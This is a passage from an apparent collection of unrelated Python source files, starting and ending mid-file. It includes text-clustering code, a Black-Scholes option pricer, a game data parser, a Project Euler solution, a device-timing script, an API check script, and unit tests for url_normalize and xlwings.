df['PC2_NN'] = pca_analysis_results_nn['PC2'] print('----------------------------------') print('Normalized data') print('----------------------------------') df_normalized = pd.DataFrame(preprocessing.normalize(v_df)) self.__cluster(df_normalized, df, normalized_label, 'Normalized', vectorizer_type) pca_analysis_results_n = self.__run_pca_analysis(df_normalized, df) self.__run_density_clustering(df_normalized, df, normalized_label) df['PC0_N'] = pca_analysis_results_n['PC0'] df['PC1_N'] = pca_analysis_results_n['PC1'] df['PC2_N'] = pca_analysis_results_n['PC2'] print('Plotting clusters using k-means, hierarchical, and density scan') self.__plot_clusters(df, f'{normalized_label}_calculated_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_3_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means (k=3) ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_4_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means (k=4) ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_6_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means (k=6) ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_8_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means (k=8) ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_10_k_means', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using K-Means (k=10) ({vectorizer_type})') self.__plot_clusters(df, f'{not_normalized_label}_calculated_k_means', 'PC0_NN', 'PC1_NN', 'PC2_NN', f'Plot of non normalized clusters using K-Means ({vectorizer_type})') self.__plot_clusters(df, f'{normalized_label}_3_hierarchical', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Hiearchical Clustering ({vectorizer_type}) (k=3)') self.__plot_clusters(df, f'{normalized_label}_4_hierarchical', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Hiearchical Clustering ({vectorizer_type}) (k=4)') self.__plot_clusters(df, f'{normalized_label}_6_hierarchical', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Hiearchical Clustering ({vectorizer_type}) (k=6)') self.__plot_clusters(df, f'{normalized_label}_8_hierarchical', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Hiearchical Clustering ({vectorizer_type}) (k=8)') self.__plot_clusters(df, f'{normalized_label}_10_hierarchical', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Hiearchical Clustering ({vectorizer_type}) (k=10)') self.__plot_clusters(df, f'{normalized_label}_density', 'PC0_N', 'PC1_N', 'PC2_N', f'Plot of normalized clusters using Density Scan ({vectorizer_type})') df = df.drop(columns=['text']) df.to_csv(f'{self.__clustered_data_location}/clustered_search_data.csv', index=False) def __cluster(self, df, input_df, clustering_type, graph_prefix, vectorizer_type): list_of_inertias = [] list_of_silhouette_scores = [] k_range = list(range(2, 10)) for k in k_range: k_means = KMeans(k, max_iter=1000) k_means.fit_predict(df) list_of_inertias.append(k_means.inertia_) score = metrics.silhouette_score(df, k_means.labels_, metric='correlation') list_of_silhouette_scores.append(score) self.plot_elbow_method(k_range, list_of_inertias, graph_prefix, vectorizer_type, clustering_type) self.plot_silhouette_method(k_range, list_of_silhouette_scores, graph_prefix, vectorizer_type, clustering_type) k_range_np = 
np.array(k_range) sil_scores = np.array(list_of_silhouette_scores) # Find the max k-value from the silhouette scores k_value = k_range_np[sil_scores == np.max(sil_scores)][0] print('Max k-value', k_value) k_means = KMeans(k_value).fit(df) k_means_label = f'{clustering_type}_calculated_k_means_label' input_df[k_means_label] = k_means.labels_ self.__plot_silhouette_clusters(df, k_means, k_value, vectorizer_type, clustering_type) print('Analysing 5 other random k values for comparison purposes', self._other_k_values) for random_k_value in self._other_k_values: k_means_r = KMeans(random_k_value).fit(df) k_means_label_r = f'{clustering_type}_{random_k_value}_k_means_label' input_df[k_means_label_r] = k_means_r.labels_ self.__plot_silhouette_clusters(df, k_means_r, random_k_value, vectorizer_type, clustering_type) self.__run_hierarchical_clustering(df, 3, input_df, clustering_type) self.__run_hierarchical_clustering(df, 4, input_df, clustering_type) self.__run_hierarchical_clustering(df, 6, input_df, clustering_type) self.__run_hierarchical_clustering(df, 8, input_df, clustering_type) self.__run_hierarchical_clustering(df, 10, input_df, clustering_type) self.__plot_dendrogram(df, input_df, clustering_type, vectorizer_type) def plot_elbow_method(self, k_range, list_of_inertias, graph_prefix, vectorizer_type, clustering_type): print('Plotting elbow method') plt.figure() plt.plot(k_range, list_of_inertias, 'bx-') plt.xlabel('k') plt.ylabel('Inertia') plt.title(f'Plot of elbow method using Inertia -- {graph_prefix} ({vectorizer_type})') plt.savefig(f'{self.__clustered_visualizations_location}/elbow_method/elbow_method_{clustering_type}.png') df = pd.DataFrame(data={'K': k_range, 'Inertia': list_of_inertias}) df.to_csv(f'{self.__clustered_data_location}/elbow_method/elbow_method_{clustering_type}.csv', index=False) def plot_silhouette_method(self, k_range, list_of_silhouette_scores, graph_prefix, vectorizer_type, clustering_type): print('Plotting silhouette method') plt.figure() plt.plot(k_range, list_of_silhouette_scores, 'bx-') plt.xlabel('k') plt.ylabel('Silhouette Score') plt.title(f'Plot of silhouette method -- {graph_prefix} ({vectorizer_type})') plt.savefig(f'{self.__clustered_visualizations_location}/silhouette_method/silhouette_method_{clustering_type}.png') df = pd.DataFrame(data={'K': k_range, 'Silhouette Score': list_of_silhouette_scores}) df.to_csv(f'{self.__clustered_data_location}/silhouette_method/silhouette_method_{clustering_type}.csv', index=False) def __run_pca_analysis(self, df_normalized, input_df): print('Running PCA Analysis to reduce dimensionality') text_pca = PCA(n_components=3) df_normalized = np.transpose(df_normalized) text_pca.fit(df_normalized) components = pd.DataFrame(text_pca.components_.T, columns=['PC%s' % _ for _ in range(3)]) components['topic'] = input_df['topic'] return components def clusterByTopic(self, cluster, topic): return cluster.value_counts()[topic] if topic in cluster.value_counts() else 0 def __plot_clusters(self, df, clustering_type, x, y, z, title): k_means_label = f'{clustering_type}_label' fig = px.scatter(df, x=x, y=y, text="topic", color=k_means_label, hover_data=['topic', 'link'], log_x=True, size_max=60) fig.update_traces(textposition='top center') fig.update_layout( height=800, title_text=title ) output_file = f'{self.__clustered_visualizations_location}/clustered_2d/{clustering_type}.html' fig.write_html(output_file) fig3d = px.scatter_3d(df, x=x, y=y, z=z, text="topic", color=k_means_label, hover_data=['topic', 'link'],) 
fig3d.update_traces(textposition='top center') fig3d.update_layout( height=800, title_text=title ) output_file = f'{self.__clustered_visualizations_location}/clustered_3d/{clustering_type}.html' fig3d.write_html(output_file) print('Gathering Statistics') statistics_df = df[['topic', k_means_label]].groupby([k_means_label]).agg( covid=pd.NamedAgg(column='topic', aggfunc=lambda t: self.clusterByTopic(t, 'covid')), drought=pd.NamedAgg(column='topic', aggfunc=lambda t: self.clusterByTopic(t, 'drought')), locusts=pd.NamedAgg(column='topic', aggfunc=lambda t: self.clusterByTopic(t, 'locusts')), ebola=pd.NamedAgg(column='topic', aggfunc=lambda t: self.clusterByTopic(t, 'ebola')) ) statistics_df['Cluster'] = [i for i in range(statistics_df.shape[0])] output_file = f'{self.__clustered_data_location}/clustering_statistics/{clustering_type}.csv' statistics_df.to_csv(output_file, index=False) print(statistics_df) def __plot_silhouette_clusters(self, df, k_means, k_value, vectorizer_type, clustering_type): print('Plotting silhouette clusters', k_value) plt.figure() # get silhouette scores sil_coe = metrics.silhouette_samples(df, k_means.labels_) sil_score = metrics.silhouette_score(df, k_means.labels_) # create subplots and define range low_range = 0 up_range = 0 # plot bar plot for each cluster for cluster in set(k_means.labels_): cluster_coefs = sil_coe[k_means.labels_ == cluster] cluster_coefs.sort() up_range += len(cluster_coefs) plt.barh(range(low_range, up_range), cluster_coefs, height=1) plt.text(-0.05, (up_range + low_range) / 2, str(cluster)) low_range += len(cluster_coefs) plt.suptitle("Silhouette Coefficients for k = " + str(k_value) + " -- Vectorizer Type = " + vectorizer_type + "\n Score = " + str(round(sil_score, 2)), y=1) plt.title("Coefficient Plots") plt.xlabel("Silhouette Coefficients") plt.ylabel("Cluster") plt.yticks([]) plt.axvline(sil_score, color="red", linestyle="--") plt.savefig(f'{self.__clustered_visualizations_location}/silhouette/silhouette_cluster_{k_value}_{clustering_type}.png') def __run_hierarchical_clustering(self, df, k_value, input_df, clustering_type): print('Running hierarchical clustering with k =', k_value) clustered_data = AgglomerativeClustering(n_clusters=k_value, affinity='euclidean', linkage='ward') fitted_data = clustered_data.fit(df) input_df[f'{clustering_type}_{k_value}_hierarchical_label'] = fitted_data.labels_ def __plot_dendrogram(self, df, input_df, clustering_type, vectorizer_type): print('Plotting dendrogram') fig = ff.create_dendrogram(df, labels=input_df['topic'].to_list()) fig.update_layout(width=800, height=500, title=f'Hierarchical Clustering Dendrogram with ' f'Vectorizer Type = {vectorizer_type}') output_file = f'{self.__clustered_visualizations_location}/dendrogram/dendrogram_{clustering_type}.html' fig.write_html(output_file) def __run_density_clustering(self, df, input_df, clustering_type): print('Running density clustering') max_clusters = 0 associated_labels = [] for i in map(lambda x: x / 10.0, range(2, 20, 2)): for j in range(5, 40): set_of_labels = DBSCAN(eps=i, min_samples=j, metric='cosine').fit(df).labels_ if len(set(set_of_labels)) >= max_clusters: max_clusters = len(set(set_of_labels)) associated_labels = set_of_labels input_df[f'{clustering_type}_density_label'] = associated_labels print('Number of clusters for density', len(set(associated_labels))) def store_clustered_search_data(self): print('Store processed survey data in S3') html_visualizations = list(glob.iglob(f'{self.__clustered_visualizations_location}/**/*.html', 
recursive=True)) for file in html_visualizations: print('Opening file', file) contents = codecs.open(file, 'r') print('Uploading', file, 'to S3') self._s3_api.upload_html(contents.read(), file.replace('clustered_data_visualizations/', ''), S3Api.S3Location.CLUSTERED_DATA_VISUALIZATIONS) contents.close() png_visualizations = list(glob.iglob(f'{self.__clustered_visualizations_location}/**/*.png', recursive=True)) for file in png_visualizations: print('Opening file', file) png = open(file, "rb") print('Attempting to upload clustered visualized search data to s3') self._s3_api.upload_png(png, file.replace('clustered_data_visualizations/', ''), S3Api.S3Location.CLUSTERED_DATA_VISUALIZATIONS) print('Uploading', file, 'to S3') print('Successfully uploaded') png.close() clustered_csv_data = list(glob.iglob(f'{self.__clustered_data_location}/**/*.csv', recursive=True)) for file in clustered_csv_data: print('Opening file', file) df = pd.read_csv(file) print('Attempting to upload clustered search data to s3') self._s3_api.upload_df(df, file.replace('clustered_data/', ''), S3Api.S3Location.CLUSTERED_DATA) print('Uploading', file, 'to S3') print('Successfully uploaded') print('Uploaded all files') if __name__ == '__main__': from dotenv import load_dotenv from FileStorage import FileStorage load_dotenv() fs = FileStorage() fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/elbow_method/') fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/silhouette_method/') fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/clustered_2d/') fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/clustered_3d/') fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/silhouette/') fs.create_directory_if_not_exists('clustered_data_visualizations/search_results/dendrogram/') fs.create_directory_if_not_exists('clustered_data/search_results/clustering_statistics/') fs.create_directory_if_not_exists('clustered_data/search_results/elbow_method/') fs.create_directory_if_not_exists('clustered_data/search_results/silhouette_method/') search_clustering = CustomSearchClustering(fs, S3Api.S3Api()) search_clustering.cluster_search_data() if STORE_DATA: search_clustering.store_clustered_search_data()
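# Editorial note (not part of the original module): the k selection earlier in this
# file picks the k whose silhouette score is maximal, i.e.
#   k_value = k_range_np[sil_scores == np.max(sil_scores)][0]
# For illustration only: with k_range = [2, 3, 4] and silhouette scores
# [0.41, 0.55, 0.48], that boolean mask selects k = 3 (these numbers are made up).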
python
# -*- coding: utf-8 -*- """ Created on Mon Jan 15 17:35:51 2018 @author: Dr Kaustav Das ([email protected]) """ # import numpy as np import copy as cp from math import sqrt, exp, log from collections import deque from scipy.stats import norm # Computes the usual Black Scholes Put/Call formula (not PutBS) for piecewise-constant # parameters. # S0 (float): initial spot. # sig (float): initial volatility. # Strk (float): strike value of the contract. # rd_deque (deque): domestic interest rate, given backward, e.g., rd_deque = deque([rd2, rd1]). # rf_deque (deque): foreign interest rate, given backward, e.g., rf_deque = deque([rf2, rf1]). # dt (deque): deque of time increments over which each parameter is 'alive', # given backward, e.g., dt = deque([dt2, dt1]). Note sum(dt) gives option maturity T. # option (str): 'Put' or 'Call'. def BSform_pw(S0, sig, Strk, _rd_deque, _rf_deque, _dt, option): # Copy deques rd_deque = cp.copy(_rd_deque) rf_deque = cp.copy(_rf_deque) dt = cp.copy(_dt) # We now compute discretised versions of int (rd - rf)dt, e^(-int rd dt) # and e^(-int rf dt), as well as T rsumdt = 0 expmrd = 1 expmrf = 1 T = 0 lastlayer = deque([]) while dt != lastlayer: DT = dt.popleft() RD = rd_deque.popleft() RF = rf_deque.popleft() R = RD - RF rsumdt += R*DT expmrd *= exp(-DT*RD) expmrf *= exp(-DT*RF) T += DT sqrtT = sqrt(T) sigsqrtT = sig*sqrtT lograt = log(S0/Strk) dpl = (lograt + rsumdt)/sigsqrtT+ 0.5*sigsqrtT dm = dpl - sigsqrtT if option == 'Put': H = Strk*expmrd*norm.cdf(-1.0*dm) - S0*expmrf*norm.cdf(-1.0*dpl) elif option == 'Call': H = S0*expmrf*norm.cdf(dpl) - Strk*expmrd*norm.cdf(dm) return H # Example code. if __name__ == '__main__': S0 = 100 sig = 0.20 Strk = S0*1.01 rd3 = 0.02 rd2 = 0.01 rd1 = 0.01 rf3 = 0.00 rf2 = 0.00 rf1 = 0.00 dt3 = 1/12 dt2 = 1/12 dt1 = 1/12 rd_deque = deque([rd3, rd2, rd1]) rf_deque = deque([rf3, rf2, rf1]) dt = deque([dt3, dt2, dt1]) option = 'Put' print(BSform_pw(S0, sig, Strk, rd_deque, rf_deque, dt, option))
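# Editorial note (not part of the original script): with the discretised integrals
# computed above, BSform_pw implements the Garman-Kohlhagen / Black-Scholes form with
# piecewise-constant rates, where N(.) is the standard normal CDF (norm.cdf):
#   d+ = [ln(S0/K) + int(rd - rf) dt] / (sig*sqrt(T)) + 0.5*sig*sqrt(T),   d- = d+ - sig*sqrt(T)
#   Put  = K*exp(-int rd dt)*N(-d-) - S0*exp(-int rf dt)*N(-d+)
#   Call = S0*exp(-int rf dt)*N(d+) - K*exp(-int rd dt)*N(d-)
# which is exactly what dpl, dm and H compute.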
python
import xml.etree.ElementTree as ET import traceback def build_crafting_lookup(): # TODO: Keep working on this, I think only one ingredient is in the list currently. """ Returns a crafting lookup table :return: """ crafting_dict = {} itemtree = ET.parse('libs/game_data/items.xml') itemroot = itemtree.getroot() for item in itemroot.getchildren(): # Check if item is craftable crafting_requirements = item.findall('craftingrequirements') print(item.attrib['uniquename']) # If this is greater than 0, there's items that can craft into this item if len(crafting_requirements) > 0: recipes = [] for recipe in crafting_requirements: recipe_dict = {} for ingredient in recipe.getchildren(): recipe_dict['uniquename'] = ingredient.attrib['uniquename'] recipe_dict['count'] = ingredient.attrib['count'] recipes.append(recipe_dict) print(recipes) def build_item_lookup(localization_dictionary): """ Creates a dictionary of items with the localization provided. :return: dictionary of items """ item_xml = ET.parse('libs/game_data/items.xml') item_root = item_xml.getroot() items = item_root.getchildren() """ Example Item Format: (T2_2H_Bow) In [29]: ri Out[29]: <Element 'weapon' at 0x7fd2afa6b688> In [30]: ri.attrib Out[30]: {'abilitypower': '120', 'activespellslots': '3', 'attackdamage': '29', 'attackrange': '11', 'attackspeed': '1', 'attacktype': 'ranged', 'durability': '5647', 'durabilityloss_attack': '1', 'durabilityloss_receivedattack': '1', 'durabilityloss_receivedspell': '1', 'durabilityloss_spelluse': '1', 'focusfireprotectionpeneration': '0', 'fxbonename': 'LeftArm_3', 'fxboneoffset': '0.2 -0.227 0.135', 'hitpointsmax': '0', 'hitpointsregenerationbonus': '0', 'itempower': '300', 'itempowerprogressiontype': 'mainhand', 'magicspelldamagebonus': '0', 'mainhandanimationtype': 'bow', 'maxqualitylevel': '5', 'passivespellslots': '1', 'physicalspelldamagebonus': '0', 'shopcategory': 'ranged', 'shopsubcategory1': 'bow', 'slottype': 'mainhand', 'tier': '2', 'twohanded': 'true', 'uiatlas': 'RefItemAtlas', 'uniquename': 'T2_2H_BOW', 'unlockedtocraft': 'false', 'unlockedtoequip': 'false', 'weight': '3'} In [31]: ri.getchildren() Out[31]: [<Element 'projectile' at 0x7fd2afa6b728>, <Element 'SocketPreset' at 0x7fd2afa6b818>, <Element 'craftingrequirements' at 0x7fd2afa6b868>, <Element 'craftingspelllist' at 0x7fd2afa6b908>, <Element 'AudioInfo' at 0x7fd2afa6bb88>] In [32]: ri.get('projectile') In [33]: ri.find('projectile') Out[33]: <Element 'projectile' at 0x7fd2afa6b728> In [34]: ri.find('craftingrequirements') Out[34]: <Element 'craftingrequirements' at 0x7fd2afa6b868> In [35]: c = _ In [36]: c Out[36]: <Element 'craftingrequirements' at 0x7fd2afa6b868> In [37]: c.getchildren() Out[37]: [<Element 'craftresource' at 0x7fd2afa6b8b8>] In [38]: c.getchildren()[0] Out[38]: <Element 'craftresource' at 0x7fd2afa6b8b8> In [39]: c.getchildren()[0].attrib Out[39]: {'count': '32', 'uniquename': 'T2_PLANKS'} """ def build_localization_lookup(lang='EN-US'): """ Takes the localization XML and builds a lookup dictionary for the language given :return: dictionary of {itemID:localized name} """ loc_dict = {} loc_tree = ET.parse('libs/game_data/localization.xml') loc_root = loc_tree.getroot() # TODO: This [0] reference might cause a bug, find a cleaner way loc_items = loc_root.getchildren()[0] for item in loc_items: try: # Get the item ID string item_id = item.attrib['tuid'] # Get the target lang for localization for loc_str in item: if loc_str.attrib['{http://www.w3.org/XML/1998/namespace}lang'] == lang: localized = 
loc_str.find('seg').text if localized is not None: loc_dict[item_id] = localized else: loc_dict[item_id] = item_id break else: loc_dict[item_id] = item_id except: print(traceback.format_exc()) return loc_dict
python
def main(): for a in range(1,int(1000/3)+1): for b in range(a+1, int(500-a/2)+1): # b < c <=> b < 1000-(a+b) <=> b < 500 - a/2 if chkVal(a, b): print(a * b * (1000-(a+b))) def chkVal(a, b): left_term = a**2 + b**2 right_term = (1000 - (a + b))**2 return left_term == right_term if __name__=="__main__": main() # Answer: 31875000
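# Editorial check (not part of the original solution): the triplet found is
# a=200, b=375, c=425, since 200**2 + 375**2 = 40000 + 140625 = 180625 = 425**2
# and 200 + 375 + 425 = 1000, so the printed product is 200*375*425 = 31875000,
# matching the answer noted above.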
python
import time from hyades.inventory.inventory import InventoryManager inventory = InventoryManager('inventory.yml') connectors_result = {} for device in inventory.filter(mode='sync'): connector = device.connection_manager.registry_name print(f'\nStart collecting {device.name} with {connector}') connectors_result[connector] = [] for it in range(10): start = time.time() device.connect() output = device.parse("show version") print(output) device.disconnect() end = time.time() connectors_result[connector].append(end - start) print('\n\n') for connector in connectors_result: total_time = sum(connectors_result[connector]) mean_time = total_time/len(connectors_result[connector]) min_time = min(connectors_result[connector]) max_time = max(connectors_result[connector]) print(f"Connector: {connector}:\n" f"Max time: {max_time}\n" f"Min time: {min_time}\n" f"Mean time: {mean_time}\n\n")
python
from yourproduct.config import Config CONFIG: Config = Config()
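# Editorial note (not part of the original module): CONFIG is meant as a module-level
# singleton; other code would import this instance (e.g. `from <this_module> import CONFIG`,
# where the actual module path is not shown here) rather than constructing Config() again.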
python
# -*- coding: utf-8 -*- from __future__ import print_function from ._version import get_versions __author__ = 'Juan Ortiz' __email__ = '[email protected]' __version__ = get_versions()['version'] del get_versions def hello_world(): print('Hello, world!') return True
python
#!/usr/bin/env python import json import time try: import requests except ImportError: print "Install requests python module. pip install requests" exit(1) GREEN = '\033[92m' RED = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' def check_file(value): try: f = open(value) return f.read().strip() except IOError: print "[-] The file '{}' not found in current directory.".format(value) exit(1) URL = "http://{}:{}/configs/".format(check_file("ip"), check_file("nodePort")) try: f = open("sample_data.json") except IOError: print "[-] sample_data.json file is missing" exit(0) json_data = json.load(f) print "[+] JSON Data Loaded" with open("deleted_list.txt") as f: stored_list = f.readlines() print GREEN+"[+] Trying fetch deleted items which should FAIL!"+ENDC for config in stored_list: res = requests.get(url=URL+config.strip()) print "[*] [GET] HTTP Status code for the config {0} is {1}".format(config.strip(), res.status_code) print " [-] Response Text ->", res.text time.sleep(1) with open("available_list.txt") as f: stored_list = f.readlines() print GREEN+"[+] Trying fetch available items which should SUCCESS!"+ENDC for config in stored_list: res = requests.get(url=URL+config.strip()) print "[*] [GET] HTTP Status code for the config {0} is {1}".format(config.strip(), res.status_code) print " [-] Response Text ->", res.text time.sleep(1)
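# Editorial note (not part of the original script): this is Python 2 code (bare `print`
# statements); under Python 3 the prints would need parentheses. It also expects the
# files "ip", "nodePort", "sample_data.json", "deleted_list.txt" and "available_list.txt"
# to be present in the current directory, as checked/opened above.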
python
"""Tests for provide_url_scheme function.""" from url_normalize.url_normalize import provide_url_scheme EXPECTED_DATA = { "": "", "-": "-", "/file/path": "/file/path", "//site/path": "https://site/path", "ftp://site/": "ftp://site/", "site/page": "https://site/page", } def test_provide_url_scheme_result_is_expected(): """Assert we got expected results from the provide_url_scheme function.""" for url, expected in EXPECTED_DATA.items(): result = provide_url_scheme(url) assert result == expected, url def test_provide_url_scheme_accept_default_scheme_param(): """Assert we could provide default_scheme param other than https.""" url = "//site/path" expected = "http://site/path" actual = provide_url_scheme(url, default_scheme="http") assert actual == expected
python
import sys import os from datetime import datetime import unittest import xlwings as xw from xlwings.constants import RgbColor from .common import TestBase, this_dir # Mac imports if sys.platform.startswith('darwin'): from appscript import k as kw class TestRangeInstantiation(TestBase): def test_range1(self): r = self.wb1.sheets[0].range('A1') self.assertEqual(r.address, '$A$1') def test_range2(self): r = self.wb1.sheets[0].range('A1:A1') self.assertEqual(r.address, '$A$1') def test_range3(self): r = self.wb1.sheets[0].range('B2:D5') self.assertEqual(r.address, '$B$2:$D$5') def test_range4(self): r = self.wb1.sheets[0].range((1, 1)) self.assertEqual(r.address, '$A$1') def test_range5(self): r = self.wb1.sheets[0].range((1, 1), (1, 1)) self.assertEqual(r.address, '$A$1') def test_range6(self): r = self.wb1.sheets[0].range((2, 2), (5, 4)) self.assertEqual(r.address, '$B$2:$D$5') def test_range7(self): r = self.wb1.sheets[0].range('A1', (2, 2)) self.assertEqual(r.address, '$A$1:$B$2') def test_range8(self): r = self.wb1.sheets[0].range((1, 1), 'B2') self.assertEqual(r.address, '$A$1:$B$2') def test_range9(self): r = self.wb1.sheets[0].range(self.wb1.sheets[0].range('A1'), self.wb1.sheets[0].range('B2')) self.assertEqual(r.address, '$A$1:$B$2') def test_range10(self): with self.assertRaises(ValueError): r = self.wb1.sheets[0].range(self.wb2.sheets[0].range('A1'), self.wb1.sheets[0].range('B2')) def test_range11(self): with self.assertRaises(ValueError): r = self.wb1.sheets[1].range(self.wb1.sheets[0].range('A1'), self.wb1.sheets[0].range('B2')) def test_range12(self): with self.assertRaises(ValueError): r = self.wb1.sheets[0].range(self.wb1.sheets[1].range('A1'), self.wb1.sheets[0].range('B2')) def test_range13(self): with self.assertRaises(ValueError): r = self.wb1.sheets[0].range(self.wb1.sheets[0].range('A1'), self.wb1.sheets[1].range('B2')) def test_zero_based_index1(self): with self.assertRaises(IndexError): self.wb1.sheets[0].range((0, 1)).value = 123 def test_zero_based_index2(self): with self.assertRaises(IndexError): a = self.wb1.sheets[0].range((1, 1), (1, 0)).value def test_zero_based_index3(self): with self.assertRaises(IndexError): xw.Range((1, 0)).value = 123 def test_zero_based_index4(self): with self.assertRaises(IndexError): a = xw.Range((1, 0), (1, 0)).value def test_jagged_array(self): with self.assertRaises(Exception): self.wb1.sheets[0].range('A1').value = [[1], [1, 2]] with self.assertRaises(Exception): self.wb1.sheets[0].range('A1').value = [[1, 2, 3], [4, 5], [6, 7, 8]] with self.assertRaises(Exception): self.wb1.sheets[0].range('A1').value = ((1,), (1, 2)) # the following should not raise an error self.wb1.sheets[0].range('A1').value = 1 self.wb1.sheets[0].range('A1').value = 's' self.wb1.sheets[0].range('A1').value = [[1, 2], [1, 2]] self.wb1.sheets[0].range('A1').value = [1, 2, 3] self.wb1.sheets[0].range('A1').value = [[1, 2, 3]] self.wb1.sheets[0].range('A1').value = [] class TestRangeAttributes(TestBase): def test_iterator(self): self.wb1.sheets[0].range('A20').value = [[1., 2.], [3., 4.]] r = self.wb1.sheets[0].range('A20:B21') self.assertEqual([c.value for c in r], [1., 2., 3., 4.]) # check that reiterating on same range works properly self.assertEqual([c.value for c in r], [1., 2., 3., 4.]) def test_sheet(self): self.assertEqual(self.wb1.sheets[1].range('A1').sheet.name, self.wb1.sheets[1].name) def test_len(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4')), 12) def test_count(self): self.assertEqual(len(self.wb1.sheets[0].range('A1:C4')), 
self.wb1.sheets[0].range('A1:C4').count) def test_row(self): self.assertEqual(self.wb1.sheets[0].range('B3:F5').row, 3) def test_column(self): self.assertEqual(self.wb1.sheets[0].range('B3:F5').column, 2) def test_row_count(self): self.assertEqual(self.wb1.sheets[0].range('B3:F5').rows.count, 3) def test_column_count(self): self.assertEqual(self.wb1.sheets[0].range('B3:F5').columns.count, 5) def raw_value(self): pass # TODO def test_clear_content(self): self.wb1.sheets[0].range('G1').value = 22 self.wb1.sheets[0].range('G1').clear_contents() self.assertEqual(self.wb1.sheets[0].range('G1').value, None) def test_clear(self): self.wb1.sheets[0].range('G1').value = 22 self.wb1.sheets[0].range('G1').clear() self.assertEqual(self.wb1.sheets[0].range('G1').value, None) def test_end(self): self.wb1.sheets[0].range('A1:C5').value = 1. self.assertEqual(self.wb1.sheets[0].range('A1').end('d'), self.wb1.sheets[0].range('A5')) self.assertEqual(self.wb1.sheets[0].range('A1').end('down'), self.wb1.sheets[0].range('A5')) self.assertEqual(self.wb1.sheets[0].range('C5').end('u'), self.wb1.sheets[0].range('C1')) self.assertEqual(self.wb1.sheets[0].range('C5').end('up'), self.wb1.sheets[0].range('C1')) self.assertEqual(self.wb1.sheets[0].range('A1').end('right'), self.wb1.sheets[0].range('C1')) self.assertEqual(self.wb1.sheets[0].range('A1').end('r'), self.wb1.sheets[0].range('C1')) self.assertEqual(self.wb1.sheets[0].range('C5').end('left'), self.wb1.sheets[0].range('A5')) self.assertEqual(self.wb1.sheets[0].range('C5').end('l'), self.wb1.sheets[0].range('A5')) def test_formula(self): self.wb1.sheets[0].range('A1').formula = '=SUM(A2:A10)' self.assertEqual(self.wb1.sheets[0].range('A1').formula, '=SUM(A2:A10)') def test_formula2(self): self.wb1.sheets[0].range('A1').formula2 = '=UNIQUE(A2:A10)' self.assertEqual(self.wb1.sheets[0].range('A1').formula2, '=UNIQUE(A2:A10)') def test_formula_array(self): self.wb1.sheets[0].range('A1').value = [[1, 4], [2, 5], [3, 6]] self.wb1.sheets[0].range('D1').formula_array = '=SUM(A1:A3*B1:B3)' self.assertEqual(self.wb1.sheets[0].range('D1').value, 32.) 
def test_column_width(self): self.wb1.sheets[0].range('A1:B2').column_width = 10.0 result = self.wb1.sheets[0].range('A1').column_width self.assertEqual(10.0, result) self.wb1.sheets[0].range('A1:B2').value = 'ensure cells are used' self.wb1.sheets[0].range('B2').column_width = 20.0 result = self.wb1.sheets[0].range('A1:B2').column_width if sys.platform.startswith('win'): self.assertEqual(None, result) else: self.assertEqual(kw.missing_value, result) def test_row_height(self): self.wb1.sheets[0].range('A1:B2').row_height = 15.0 result = self.wb1.sheets[0].range('A1').row_height self.assertEqual(15.0, result) self.wb1.sheets[0].range('A1:B2').value = 'ensure cells are used' self.wb1.sheets[0].range('B2').row_height = 20.0 result = self.wb1.sheets[0].range('A1:B2').row_height if sys.platform.startswith('win'): self.assertEqual(None, result) else: self.assertEqual(kw.missing_value, result) def test_width(self): """test_width: Width depends on default style text size, so do not test absolute widths""" self.wb1.sheets[0].range('A1:D4').column_width = 10.0 result_before = self.wb1.sheets[0].range('A1').width self.wb1.sheets[0].range('A1:D4').column_width = 12.0 result_after = self.wb1.sheets[0].range('A1').width self.assertTrue(result_after > result_before) def test_height(self): self.wb1.sheets[0].range('A1:D4').row_height = 60.0 result = self.wb1.sheets[0].range('A1:D4').height self.assertEqual(240.0, result) def test_left(self): self.assertEqual(self.wb1.sheets[0].range('A1').left, 0.0) self.wb1.sheets[0].range('A1').column_width = 20.0 self.assertEqual(self.wb1.sheets[0].range('B1').left, self.wb1.sheets[0].range('A1').width) def test_top(self): self.assertEqual(self.wb1.sheets[0].range('A1').top, 0.0) self.wb1.sheets[0].range('A1').row_height = 20.0 self.assertEqual(self.wb1.sheets[0].range('A2').top, self.wb1.sheets[0].range('A1').height) def test_number_format_cell(self): format_string = "mm/dd/yy;@" self.wb1.sheets[0].range('A1').number_format = format_string result = self.wb1.sheets[0].range('A1').number_format self.assertEqual(format_string, result) def test_number_format_range(self): format_string = "mm/dd/yy;@" self.wb1.sheets[0].range('A1:D4').number_format = format_string result = self.wb1.sheets[0].range('A1:D4').number_format self.assertEqual(format_string, result) def test_get_address(self): wb1 = self.app1.books.open(os.path.join(this_dir, 'test book.xlsx')) res = wb1.sheets[0].range((1, 1), (3, 3)).get_address() self.assertEqual(res, '$A$1:$C$3') res = wb1.sheets[0].range((1, 1), (3, 3)).get_address(False) self.assertEqual(res, '$A1:$C3') res = wb1.sheets[0].range((1, 1), (3, 3)).get_address(True, False) self.assertEqual(res, 'A$1:C$3') res = wb1.sheets[0].range((1, 1), (3, 3)).get_address(False, False) self.assertEqual(res, 'A1:C3') res = wb1.sheets[0].range((1, 1), (3, 